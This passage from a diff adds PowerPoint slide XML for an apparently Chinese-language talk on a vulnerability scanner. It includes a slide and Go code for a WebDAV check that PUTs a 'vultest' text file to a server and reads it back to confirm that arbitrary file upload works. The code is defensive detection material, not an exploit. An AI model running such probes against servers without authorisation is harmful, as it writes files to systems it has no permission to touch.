+              <a:t>      result := </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="4EADE5"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>d</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>.info</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>result.Response</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>resp.ResponseRaw</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>result.Request</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>resp.RequestRaw</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="4EADE5"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>d</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>.result</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>append</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="4EADE5"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>d</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>.result</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>result)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>return true</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>}</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>}</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1785634911"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide21.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="标题 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6B8DE4A-EECC-1A4A-85F2-A2490DCCC6A9}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913775" y="618518"/>
+            <a:ext cx="10364452" cy="696716"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>Web</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>dav</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>检测</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="文本框 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C62A8A7-AF2A-6845-ACED-09D6760A16E1}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1728592" y="1578279"/>
+            <a:ext cx="8680537" cy="923330"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>Web</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>dav</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>模块会检测</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>web</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>服务器是否</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>开启了</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>WebDav</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>且配置不当导致攻击者可上传文件到</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>web</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>目录，实现逻辑就是会尝试发起</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>put</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>请求，然后想服务器发送一个测试文件，然后再使用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>get</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>请求，看看能不能获取这个文件，代码在下面的一个</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>ppt</a:t>
+            </a:r>
+            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="文本框 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3288819B-A848-2E4D-8B59-86723555BBF2}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1227551" y="2818356"/>
+            <a:ext cx="10258816" cy="3569918"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414903076"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide22.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="文本框 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDFD9FA4-EA5D-6344-8EC9-08A4C3502894}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1791222" y="0"/>
+            <a:ext cx="8154444" cy="6278257"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPts val="1340"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>func</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> (d *</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>webDav</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>) Check(URL string, meta </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>plugin.TaskMeta</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>) bool {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>fmt.Println</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(URL)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>putURL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> := URL + "/" + </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>util.GetRandomString</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(6) + ".txt"</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   request, err := </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>http.NewRequest</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>("PUT", </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>putURL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>strings.NewReader</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>("</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>vultest</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>"))</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   if err != nil {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>fmt.Println</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>err.Error</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>())</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>log.Error</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(err)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      return false</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   }</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   _, err = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>util.RequestDo</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(request, false, 15)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   if err != nil {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>fmt.Println</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>err.Error</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>())</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>log.Error</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(err)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      return false</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   }</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>vRequest</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>, err := </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>http.NewRequest</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>("GET", </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>putURL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>, nil)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   if err != nil {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>fmt.Println</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>err.Error</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>())</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>log.Error</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(err)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      return false</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   }</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   resp, err := </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>util.RequestDo</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>vRequest</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>, true, 15)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   if err != nil {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>fmt.Println</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>err.Error</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>())</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>log.Error</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(err)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      return false</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   }</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   if </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>strings.Contains</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>resp.ResponseRaw</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>, "</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>vultest</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>") {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      result := </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>d.info</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>result.Response</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>resp.ResponseRaw</a:t>
+            </a:r>
